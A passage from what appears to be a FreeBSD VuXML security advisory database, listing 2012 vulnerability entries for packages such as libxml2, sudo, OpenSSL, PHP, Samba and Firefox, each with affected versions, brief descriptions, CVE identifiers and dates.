is false if new users exploit the vulnerability detailed in this
alert to manipulate the registration agent into creating that
content for them.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1004</cvename>
<url>http://foswiki.org/Support/SecurityAlert-CVE-2012-1004</url>
</references>
<dates>
<discovery>2012-04-13</discovery>
<entry>2012-05-21</entry>
</dates>
</vuln>
<vuln vid="b8ae4659-a0da-11e1-a294-bcaec565249c">
<topic>libxml2 -- An off-by-one out-of-bounds write by XPointer</topic>
<affects>
<package>
<name>libxml2</name>
<range><lt>2.7.8_3</lt></range>
</package>
<package>
<name>linux-f10-libxml2</name>
<range><lt>2.7.8_3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Google chrome team reports:</p>
<blockquote cite="http://googlechromereleases.blogspot.com/2012/05/stable-channel-update.html">
<p>An off-by-one out-of-bounds write flaw was found in the way libxml, a library
for providing XML and HTML support, evaluated certain XPointer parts (XPointer
is used by libxml to include only the part from the returned XML document, that
can be accessed using the XPath expression given with the XPointer). A remote
attacker could provide a specially-crafted XML file, which once opened in an
application, linked against libxml, would lead to that application crash, or,
potentially arbitrary code execution with the privileges of the user running
the application.</p>
<p>Note: The flaw to be exploited requires the particular application, linked
against libxml, to use the XPointer evaluation functionality.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3202</cvename>
<url>http://googlechromereleases.blogspot.com/2012/05/stable-channel-update.html</url>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-3102</url>
</references>
<dates>
<discovery>2012-05-15</discovery>
<entry>2012-05-18</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="f5f00804-a03b-11e1-a284-0023ae8e59f0">
<topic>inspircd -- buffer overflow</topic>
<affects>
<package>
<name>inspircd</name>
<range><ge>1.2</ge><lt>1.2.9</lt></range>
<range><ge>2.0</ge><lt>2.0.5_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>InspIRCd reports:</p>
<blockquote cite="http://inspircd.github.com/">
<p>InspIRCd contains a heap corruption vulnerability that exists in the
dns.cpp code. The res[] buffer is allocated on the heap and can be
overflowed. The res[] buffer can be exploited during its deallocation.
The number of overflowed bytes can be controlled with DNS compression
features.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1836</cvename>
<url>http://inspircd.github.com/</url>
</references>
<dates>
<discovery>2012-03-19</discovery>
<entry>2012-05-17</entry>
<modified>2012-06-21</modified>
</dates>
</vuln>
<vuln vid="aa71daaa-9f8c-11e1-bd0a-0082a0c18826">
<topic>pidgin-otr -- format string vulnerability</topic>
<affects>
<package>
<name>pidgin-otr</name>
<range><lt>3.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The authors report:</p>
<blockquote cite="http://www.cypherpunks.ca/otr/">
<p>Versions 3.2.0 and earlier of the pidgin-otr plugin contain
a format string security flaw. This flaw could potentially be
exploited by a remote attacker to cause arbitrary code to be
executed on the user's machine.</p>
<p>The flaw is in pidgin-otr, not in libotr. Other applications
that use libotr are not affected.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2369</cvename>
<url>http://www.cypherpunks.ca/otr/</url>
</references>
<dates>
<discovery>2012-05-16</discovery>
<entry>2012-05-16</entry>
</dates>
</vuln>
<vuln vid="b3435b68-9ee8-11e1-997c-002354ed89bc">
<topic>sudo -- netmask vulnerability</topic>
<affects>
<package>
<name>sudo</name>
<range><le>1.8.4_1</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Todd Miller reports:</p>
<blockquote cite="http://www.sudo.ws/sudo/alerts/netmask.html">
<p>Sudo supports granting access to commands on a per-host basis.
The host specification may be in the form of a host name, a
netgroup, an IP address, or an IP network (an IP address with an
associated netmask).</p>
<p>When IPv6 support was added to sudo, a bug was introduced that
caused the IPv6 network matching code to be called when an IPv4
network address does not match. Depending on the value of the
uninitialized portion of the IPv6 address, it is possible for the
IPv4 network number to match when it should not. This bug only
affects IP network matching and does not affect simple IP address
matching.</p>
<p>The reported configuration that exhibited the bug was an
LDAP-based sudo installation where the sudoRole object contained
multiple sudoHost entries, each containing a different IPv4
network. File-based sudoers should be affected as well as the
same matching code is used.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2337</cvename>
<url>http://www.sudo.ws/sudo/alerts/netmask.html</url>
</references>
<dates>
<discovery>2012-05-16</discovery>
<entry>2012-05-16</entry>
</dates>
</vuln>
<vuln vid="dba5d1c9-9f29-11e1-b511-003067c2616f">
<topic>OpenSSL -- DTLS and TLS 1.1, 1.2 denial of service</topic>
<affects>
<package>
<name>openssl</name>
<range><lt>1.0.1_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>OpenSSL security team reports:</p>
<blockquote cite="http://www.openssl.org/news/secadv_20120510.txt">
<p>A flaw in the OpenSSL handling of CBC mode ciphersuites in TLS 1.1, 1.2 and
DTLS can be exploited in a denial of service attack on both clients and
servers.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2333</cvename>
<url>http://www.openssl.org/news/secadv_20120510.txt</url>
</references>
<dates>
<discovery>2012-05-10</discovery>
<entry>2012-05-10</entry>
</dates>
</vuln>
<vuln vid="6601127c-9e09-11e1-b5e0-000c299b62e1">
<topic>socat -- Heap-based buffer overflow</topic>
<affects>
<package>
<name>socat</name>
<range><lt>1.7.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The socat development team reports:</p>
<blockquote cite="http://www.dest-unreach.org/socat/contrib/socat-secadv3.html">
<p>This vulnerability can be exploited when socat is invoked with the
READLINE address (this is usually only used interactively) without
option "prompt" and without option "noprompt" and an attacker succeeds
to provide malicious data to the other (arbitrary) address that is then
transferred by socat to the READLINE address for output.</p>
<p>Successful exploitation may allow an attacker to execute arbitrary
code with the privileges of the socat process.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0219</cvename>
<url>www.dest-unreach.org/socat/contrib/socat-secadv3.html</url>
</references>
<dates>
<discovery>2012-05-14</discovery>
<entry>2012-05-14</entry>
</dates>
</vuln>
<vuln vid="59b68b1e-9c78-11e1-b5e0-000c299b62e1">
<topic>php -- multiple vulnerabilities</topic>
<affects>
<package>
<name>php5</name>
<range><gt>5.4</gt><lt>5.4.3</lt></range>
<range><lt>5.3.13</lt></range>
</package>
<package>
<name>php53</name>
<range><lt>5.3.13</lt></range>
</package>
<package>
<name>php52</name>
<range><lt>5.2.17_9</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The PHP Development Team reports:</p>
<blockquote cite="http://www.php.net/archive/2012.php#id2012-05-08-1">
<p>The release of PHP 5.4.13 and 5.4.3 complete a fix for the
vulnerability in CGI-based setups as originally described in
CVE-2012-1823. (CVE-2012-2311)</p>
<p>Note: mod_php and php-fpm are not vulnerable to this attack.</p>
<p>PHP 5.4.3 fixes a buffer overflow vulnerability in the
apache_request_headers() (CVE-2012-2329).</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1823</cvename>
<cvename>CVE-2012-2311</cvename>
<cvename>CVE-2012-2329</cvename>
</references>
<dates>
<discovery>2012-05-08</discovery>
<entry>2012-05-12</entry>
</dates>
</vuln>
<vuln vid="64f8b72d-9c4e-11e1-9c94-000bcdf0a03b">
<topic>libpurple -- Invalid memory dereference in the XMPP protocol plug-in by processing serie of specially-crafted file transfer requests</topic>
<affects>
<package>
<name>libpurple</name>
<range><lt>2.10.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Pidgin reports:</p>
<blockquote cite="http://pidgin.im/news/security/?id=62">
<p>A series of specially crafted file transfer requests can cause clients to reference invalid memory. The user must have accepted one of the file transfer requests.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2214</cvename>
</references>
<dates>
<discovery>2012-05-06</discovery>
<entry>2012-05-12</entry>
</dates>
</vuln>
<vuln vid="0d3547ab-9b69-11e1-bdb1-525401003090">
<topic>PivotX -- 'ajaxhelper.php' Cross Site Scripting Vulnerability</topic>
<affects>
<package>
<name>pivotx</name>
<range><le>2.3.2</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>High-Tech Bridge reports:</p>
<blockquote cite="https://www.htbridge.com/advisory/HTB23087">
<p>Input passed via the "file" GET parameter to
/pivotx/ajaxhelper.php is not properly sanitised before
being returned to the user. This can be exploited to
execute arbitrary HTML and script code in administrator's
browser session in context of the affected website.</p>
</blockquote>
</body>
</description>
<references>
<bid>52159</bid>
<cvename>CVE-2012-2274</cvename>
<url>https://www.htbridge.com/advisory/HTB23087</url>
</references>
<dates>
<discovery>2012-05-09</discovery>
<entry>2012-05-12</entry>
<modified>2012-05-14</modified>
</dates>
</vuln>
<vuln vid="b91234e7-9a8b-11e1-b666-001636d274f3">
<topic>NVIDIA UNIX driver -- access to arbitrary system memory</topic>
<affects>
<package>
<name>nvidia-driver</name>
<range><gt>173.14.35_2</gt><lt>295.71</lt></range>
<range><gt>96.43.20_3</gt><lt>173.14.35</lt></range>
<range><gt>71.86.15_3</gt><lt>96.43.20_2</lt></range>
<range><lt>71.86.15_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>NVIDIA Unix security team reports:</p>
<blockquote cite="http://nvidia.custhelp.com/app/answers/detail/a_id/3109">
<p>Security vulnerability CVE-2012-0946 in the NVIDIA UNIX driver
was disclosed to NVIDIA on March 20th, 2012. The vulnerability
makes it possible for an attacker who has read and write access
to the GPU device nodes to reconfigure GPUs to gain access to
arbitrary system memory. NVIDIA is not aware of any reports of
this vulnerability, outside of the disclosure which was made
privately to NVIDIA.</p>
<p>NVIDIA has identified the root cause of the vulnerability and
has released updated drivers which close it. [NVIDIA encourages]
all users with Geforce 8 or newer, G80 Quadro or newer, and all
Tesla GPUs to update their drivers to 295.40 or later.</p>
</blockquote>
<p>Later, it was additionally discovered that similar exploit could
be achieved through remapping of VGA window:</p>
<blockquote cite="http://nvidia.custhelp.com/app/answers/detail/a_id/3140">
<p>NVIDIA received notification of a security exploit that uses
NVIDIA UNIX device files to map and program registers to redirect
the VGA window. Through the VGA window, the exploit can access
any region of physical system memory. This arbitrary memory
access can be further exploited, for example, to escalate user
privileges.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0946</cvename>
<cvename>CVE-2012-4225</cvename>
</references>
<dates>
<discovery>2012-03-20</discovery>
<entry>2012-05-10</entry>
<modified>2012-09-12</modified>
</dates>
</vuln>
<vuln vid="3d55b961-9a2e-11e1-a2ef-001fd0af1a4c">
<topic>rubygem-mail -- multiple vulnerabilities</topic>
<affects>
<package>
<name>rubygem-mail</name>
<range><lt>2.4.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>rubygem-mail -- multiple vulnerabilities</p>
<blockquote cite="http://seclists.org/oss-sec/2012/q2/190">
<p>Two issues were fixed. They are a file system traversal in file_delivery method and arbitrary command execution when using exim or sendmail from the command line.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2139</cvename>
<cvename>CVE-2012-2140</cvename>
<url>http://seclists.org/oss-sec/2012/q2/190</url>
</references>
<dates>
<discovery>2012-03-14</discovery>
<entry>2012-05-09</entry>
</dates>
</vuln>
<vuln vid="a1d0911f-987a-11e1-a2ef-001fd0af1a4c">
<topic>node -- private information disclosure</topic>
<affects>
<package>
<name>node</name>
<name>node-devel</name>
<range><lt>0.6.17</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Private information disclosure</p>
<blockquote cite="http://blog.nodejs.org/2012/05/07/http-server-security-vulnerability-please-upgrade-to-0-6-17/">
<p>An attacker can cause private information disclosure.</p>
</blockquote>
</body>
</description>
<references>
<url>http://blog.nodejs.org/2012/05/07/http-server-security-vulnerability-please-upgrade-to-0-6-17/</url>
</references>
<dates>
<discovery>2012-04-17</discovery>
<entry>2012-05-07</entry>
</dates>
</vuln>
<vuln vid="725ab25a-987b-11e1-a2ef-001fd0af1a4c">
<topic>p5-Config-IniFiles -- unsafe temporary file creation</topic>
<affects>
<package>
<name>p5-Config-IniFiles</name>
<range><lt>2.71</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Unsafe Temporary file creation</p>
<blockquote cite="https://bitbucket.org/shlomif/perl-config-inifiles/changeset/a08fa26f4f59">
<p>Config::IniFiles used a predictable name for its temporary
file without opening it correctly.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2451</cvename>
<url>https://bitbucket.org/shlomif/perl-config-inifiles/changeset/a08fa26f4f59</url>
</references>
<dates>
<discovery>2012-05-02</discovery>
<entry>2012-05-07</entry>
</dates>
</vuln>
<vuln vid="60de13d5-95f0-11e1-806a-001143cd36d8">
<topic>php -- vulnerability in certain CGI-based setups</topic>
<affects>
<package>
<name>php5</name>
<range><gt>5.4</gt><lt>5.4.2</lt></range>
<range><lt>5.3.12</lt></range>
</package>
<package>
<name>php53</name>
<range><lt>5.3.12</lt></range>
</package>
<package>
<name>php4</name>
<range><lt>4.4.10</lt></range>
</package>
<package>
<name>php52</name>
<range><lt>5.2.17_8</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>php development team reports:</p>
<blockquote cite="http://www.php.net/archive/2012.php#id2012-05-03-1">
<p>Security Enhancements and Fixes in PHP 5.3.12:</p>
<ul>
<li>Initial fix for cgi-bin ?-s cmdarg parse issue
(CVE-2012-1823)</li>
</ul>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1823</cvename>
</references>
<dates>
<discovery>2012-05-03</discovery>
<entry>2012-05-05</entry>
</dates>
</vuln>
<vuln vid="18dffa02-946a-11e1-be9d-000c29cc39d3">
<topic>WebCalendar -- multiple vulnerabilities</topic>
<affects>
<package>
<name>WebCalendar-devel</name>
<range><le>1.2.4</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Hanno Boeck reports:</p>
<blockquote cite="http://www.openwall.com/lists/oss-security/2012/04/28/1">
<p>Fixes [are now available] for various security vulnerabilities
including LFI (local file inclusion), XSS (cross site scripting)
and others.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1495</cvename>
<cvename>CVE-2012-1496</cvename>
<url>http://packetstormsecurity.org/files/112332/WebCalendar-1.2.4-Remote-Code-Execution.html</url>
<url>http://packetstormsecurity.org/files/112323/WebCalendar-1.2.4-Pre-Auth-Remote-Code-Injection.html</url>
<url>http://archives.neohapsis.com/archives/bugtraq/2012-04/0182.html</url>
</references>
<dates>
<discovery>2012-04-28</discovery>
<entry>2012-05-02</entry>
</dates>
</vuln>
<vuln vid="2cde1892-913e-11e1-b44c-001fd0af1a4c">
<topic>php -- multiple vulnerabilities</topic>
<affects>
<package>
<name>php53</name>
<range><lt>5.3.11</lt></range>
</package>
<package>
<name>php5</name>
<range><lt>5.3.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>php development team reports:</p>
<blockquote cite="http://www.php.net/archive/2012.php#id2012-04-26-1">
<p>Security Enhancements for both PHP 5.3.11 and PHP 5.4.1:</p>
<ul>
<li>Insufficient validating of upload name leading to corrupted $_FILES indices. (CVE-2012-1172) </li>
<li>Add open_basedir checks to readline_write_history and readline_read_history.</li>
</ul>
<p>Security Enhancements for both PHP 5.3.11 only:</p>
<ul>
<li>Regression in magic_quotes_gpc fix for CVE-2012-0831.</li>
</ul>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0831</cvename>
<cvename>CVE-2012-1172</cvename>
<url>http://www.php.net/archive/2012.php#id2012-04-26-1</url>
</references>
<dates>
<discovery>2012-03-01</discovery>
<entry>2012-04-28</entry>
<modified>2012-05-04</modified>
</dates>
</vuln>
<vuln vid="0fa15e08-92ec-11e1-a94a-00215c6a37bb">
<topic>samba -- incorrect permission checks vulnerability</topic>
<affects>
<package>
<name>samba34</name>
<range><gt>3.4.*</gt><lt>3.4.17</lt></range>
</package>
<package>
<name>samba35</name>
<range><gt>3.5.*</gt><lt>3.5.15</lt></range>
</package>
<package>
<name>samba36</name>
<range><gt>3.6.*</gt><lt>3.6.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Samba project reports:</p>
<blockquote cite="http://www.samba.org/samba/security/CVE-2012-2111">
<p>Samba versions 3.4.x to 3.6.4 inclusive are affected
by a vulnerability that allows arbitrary users to modify
privileges on a file server.</p>
<p>Security checks were incorrectly applied to the Local
Security Authority (LSA) remote proceedure calls (RPC)
CreateAccount, OpenAccount, AddAccountRights and
RemoveAccountRights allowing any authenticated user
to modify the privileges database.</p>
<p>This is a serious error, as it means that authenticated
users can connect to the LSA and grant themselves the
"take ownership" privilege. This privilege is used by the
smbd file server to grant the ability to change ownership
of a file or directory which means users could take ownership
of files or directories they do not own.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2111</cvename>
</references>
<dates>
<discovery>2012-04-30</discovery>
<entry>2012-04-30</entry>
</dates>
</vuln>
<vuln vid="b428e6b3-926c-11e1-8d7b-003067b2972c">
<topic>portupgrade-devel -- lack of distfile checksums</topic>
<affects>
<package>
<name>portupgrade-devel</name>
<range><lt>0,3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Ports security team reports:</p>
<p>The portupgrade-devel port fetched directly from a git
respository without checking against a known good
SHA hash. This means that it is possible that packages
built using this port may not match the one vetted
by the maintainer. Users are advised to rebuild
portupgrade-devel from known good sources.</p>
</body>
</description>
<references>
<mlist>http://web.archiveorange.com/archive/v/6ETvLYPz7CfFT9tiHKiI</mlist>
<mlist>http://www.freebsd.org/cgi/getmsg.cgi?fetch=100677+0+/usr/local/www/db/text/2012/cvs-ports/20120506.cvs-ports</mlist>
</references>
<dates>
<discovery>2012-04-30</discovery>
<entry>2012-04-30</entry>
<modified>2012-05-06</modified>
</dates>
</vuln>
<vuln vid="5d85976a-9011-11e1-b5e0-000c299b62e1">
<topic>net-snmp -- Remote DoS</topic>
<affects>
<package>
<name>net-snmp</name>
<range><lt>5.7.1_7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Red Hat Security Response Team reports:</p>
<blockquote cite="https://bugzilla.redhat.com/show_bug.cgi?id=815813">
<p>An array index error, leading to out-of heap-based buffer read flaw was
found in the way the net-snmp agent performed lookups in the
extension table. When certain MIB subtrees were handled by the
extend directive, a remote attacker (having read privileges to the
subntree) could use this flaw to cause a denial of service condition
via an SNMP GET request involving a non-existent extension table
entry.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2141</cvename>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=815813</url>
<url>http://www.openwall.com/lists/oss-security/2012/04/26/2</url>
</references>
<dates>
<discovery>2012-04-26</discovery>
<entry>2012-04-27</entry>
</dates>
</vuln>
<vuln vid="380e8c56-8e32-11e1-9580-4061862b8c22">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>11.0,1</gt><lt>12.0,1</lt></range>
<range><lt>10.0.4,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.4,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.9</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.4</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.9</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>11.0</gt><lt>12.0</lt></range>
<range><lt>10.0.4</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>10.0.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-20 Miscellaneous memory safety hazards (rv:12.0/ rv:10.0.4)</p>
<p>MFSA 2012-21 Multiple security flaws fixed in FreeType v2.4.9</p>
<p>MFSA 2012-22 use-after-free in IDBKeyRange</p>
<p>MFSA 2012-23 Invalid frees causes heap corruption in gfxImageSurface</p>
<p>MFSA 2012-24 Potential XSS via multibyte content processing errors</p>
<p>MFSA 2012-25 Potential memory corruption during font rendering using cairo-dwrite</p>
<p>MFSA 2012-26 WebGL.drawElements may read illegal video memory due to FindMaxUshortElement error</p>
<p>MFSA 2012-27 Page load short-circuit can lead to XSS</p>
<p>MFSA 2012-28 Ambiguous IPv6 in Origin headers may bypass webserver access restrictions</p>
<p>MFSA 2012-29 Potential XSS through ISO-2022-KR/ISO-2022-CN decoding issues</p>
<p>MFSA 2012-30 Crash with WebGL content using textImage2D</p>
<p>MFSA 2012-31 Off-by-one error in OpenType Sanitizer</p>
<p>MFSA 2012-32 HTTP Redirections and remote content can be read by javascript errors</p>
<p>MFSA 2012-33 Potential site identity spoofing when loading RSS and Atom feeds</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-1187</cvename>
<cvename>CVE-2011-3062</cvename>
<cvename>CVE-2012-0467</cvename>
<cvename>CVE-2012-0468</cvename>
<cvename>CVE-2012-0469</cvename>
<cvename>CVE-2012-0470</cvename>
<cvename>CVE-2012-0471</cvename>
<cvename>CVE-2012-0472</cvename>
<cvename>CVE-2012-0473</cvename>
<cvename>CVE-2012-0474</cvename>
<cvename>CVE-2012-0475</cvename>
<cvename>CVE-2012-0477</cvename>
<cvename>CVE-2012-0478</cvename>
<cvename>CVE-2012-0479</cvename>
<cvename>CVE-2012-1126</cvename>
<cvename>CVE-2012-1127</cvename>
<cvename>CVE-2012-1128</cvename>
<cvename>CVE-2012-1129</cvename>
<cvename>CVE-2012-1130</cvename>
<cvename>CVE-2012-1131</cvename>
<cvename>CVE-2012-1132</cvename>
<cvename>CVE-2012-1133</cvename>
<cvename>CVE-2012-1134</cvename>
<cvename>CVE-2012-1135</cvename>
<cvename>CVE-2012-1136</cvename>
<cvename>CVE-2012-1137</cvename>
<cvename>CVE-2012-1138</cvename>
<cvename>CVE-2012-1139</cvename>
<cvename>CVE-2012-1140</cvename>
<cvename>CVE-2012-1141</cvename>
<cvename>CVE-2012-1142</cvename>
<cvename>CVE-2012-1143</cvename>
<cvename>CVE-2012-1144</cvename>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-20.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-21.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-22.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-23.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-24.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-25.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-26.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-27.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-28.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-29.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-30.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-31.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-32.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-33.html</url>
</references>
<dates>
<discovery>2012-04-24</discovery>
<entry>2012-04-24</entry>
</dates>
</vuln>
<vuln vid="a04247f1-8d9c-11e1-93c7-00215c6a37bb">
<topic>Dokuwiki -- cross site scripting vulnerability</topic>
<affects>
<package>
<name>dokuwiki</name>
<range><lt>20120125_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Andy Webber reports:</p>
<blockquote cite="http://bugs.dokuwiki.org/index.php?do=details&amp;task_id=2487">
<p>Add User appears to be vulnerable to Cross Site Request Forgery (CSRF/XSRF).</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2128</cvename>
<cvename>CVE-2012-2129</cvename>
</references>
<dates>
<discovery>2012-04-17</discovery>
<entry>2012-04-23</entry>
</dates>
</vuln>
<vuln vid="1c5abbe2-8d7f-11e1-a374-14dae9ebcf89">
<topic>asterisk -- multiple vulnerabilities</topic>
<affects>
<package>
<name>asterisk16</name>
<range><gt>1.6.*</gt><lt>1.6.2.24</lt></range>
</package>
<package>
<name>asterisk18</name>
<range><gt>1.8.*</gt><lt>1.8.11.1</lt></range>
</package>
<package>
<name>asterisk10</name>
<range><gt>10.*</gt><lt>10.3.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Asterisk project reports:</p>
<blockquote cite="https://www.asterisk.org/security">
<p>Remote Crash Vulnerability in SIP Channel Driver</p>
<p>Heap Buffer Overflow in Skinny Channel Driver</p>
<p>Asterisk Manager User Unauthorized Shell Access</p>
</blockquote>
</body>
</description>
<references>
<url>http://downloads.digium.com/pub/security/AST-2012-004.html</url>
<cvename>CVE-2012-2414</cvename>
<url>http://downloads.digium.com/pub/security/AST-2012-005.html</url>
<cvename>CVE-2012-2415</cvename>
<url>http://downloads.digium.com/pub/security/AST-2012-006.html</url>
<cvename>CVE-2012-2416</cvename>
</references>
<dates>
<discovery>2012-04-23</discovery>
<entry>2012-04-23</entry>
</dates>
</vuln>
<vuln vid="b384cc5b-8d56-11e1-8d7b-003067b2972c">
<topic>wordpress -- multiple vulnerabilities</topic>
<affects>
<package>
<name>wordpress</name>
<range><lt>3.3.2,1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Wordpress reports:</p>
<blockquote cite="https://codex.wordpress.org/Version_3.3.2">
<p>External code has been updated to
non-vulnerable versions.
In addition the following bugs have been fixed:</p>
<ul>
<li>Limited privilege escalation where a site administrator could
deactivate network-wide plugins when running a WordPress network under
particular circumstances.</li>
<li>Cross-site scripting vulnerability when making URLs
clickable.</li>
<li>Cross-site scripting vulnerabilities in redirects after posting
comments in older browsers, and when filtering URLs.</li>
</ul>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2399</cvename>
<cvename>CVE-2012-2400</cvename>
<cvename>CVE-2012-2401</cvename>
<cvename>CVE-2012-2402</cvename>
<cvename>CVE-2012-2403</cvename>
<cvename>CVE-2012-2404</cvename>
<url>https://codex.wordpress.org/Version_3.3.2</url>
</references>
<dates>
<discovery>2012-04-20</discovery>
<entry>2012-04-23</entry>
</dates>
</vuln>
<vuln vid="7184f92e-8bb8-11e1-8d7b-003067b2972c">
<topic>OpenSSL -- integer conversions result in memory corruption</topic>
<affects>
<package>
<name>openssl</name>
<range><lt>1.0.1_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>OpenSSL security team reports:</p>
<blockquote cite="http://www.openssl.org/news/secadv_20120419.txt">
<p>A potentially exploitable vulnerability has been discovered in the OpenSSL
function asn1_d2i_read_bio.
Any application which uses BIO or FILE based functions to read untrusted DER
format data is vulnerable. Affected functions are of the form d2i_*_bio or
d2i_*_fp, for example d2i_X509_bio or d2i_PKCS12_fp.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2110</cvename>
<mlist msgid="20120419103522.GN30784@cmpxchg8b.com">http://marc.info/?l=full-disclosure&amp;m=133483221408243</mlist>
<url>http://www.openssl.org/news/secadv_20120419.txt</url>
</references>
<dates>
<discovery>2012-04-19</discovery>
<entry>2012-04-21</entry>
</dates>
</vuln>
<vuln vid="09c87973-8b9d-11e1-b393-20cf30e32f6d">
<topic>bugzilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>bugzilla</name>
<range><ge>3.6.0</ge><lt>3.6.9</lt></range>
<range><ge>4.0.0</ge><lt>4.0.6</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<h1>A Bugzilla Security Advisory reports:</h1>
<blockquote cite="http://www.bugzilla.org/security/3.6.8/">
<p>The following security issues have been discovered in
Bugzilla:</p>
<h1>Unauthorized Access</h1>
<p>Due to a lack of proper validation of the X-FORWARDED-FOR
header of an authentication request, an attacker could bypass
the current lockout policy used for protection against brute-
force password discovery. This vulnerability can only be
exploited if the 'inbound_proxies' parameter is set.</p>
<h1>Cross Site Scripting</h1>
<p>A JavaScript template used by buglist.cgi could be used
by a malicious script to permit an attacker to gain access
to some information about bugs he would not normally be
allowed to see, using the victim's credentials. To be
exploitable, the victim must be logged in when visiting
the attacker's malicious page.</p>
<p>All affected installations are encouraged to upgrade as soon
as possible.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0465</cvename>
<cvename>CVE-2012-0466</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=728639</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=745397</url>
</references>
<dates>
<discovery>2012-04-18</discovery>
<entry>2012-04-21</entry>
</dates>
</vuln>
<vuln vid="67516177-88ec-11e1-9a10-0023ae8e59f0">
<topic>typo -- Cross-Site Scripting</topic>
<affects>
<package>
<name>typo3</name>
<range><ge>4.6.0</ge><le>4.6.7</le></range>
<range><ge>4.5.0</ge><le>4.5.14</le></range>
<range><ge>4.4.0</ge><le>4.4.14</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Typo Security Team reports:</p>
<blockquote cite="https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-002/">
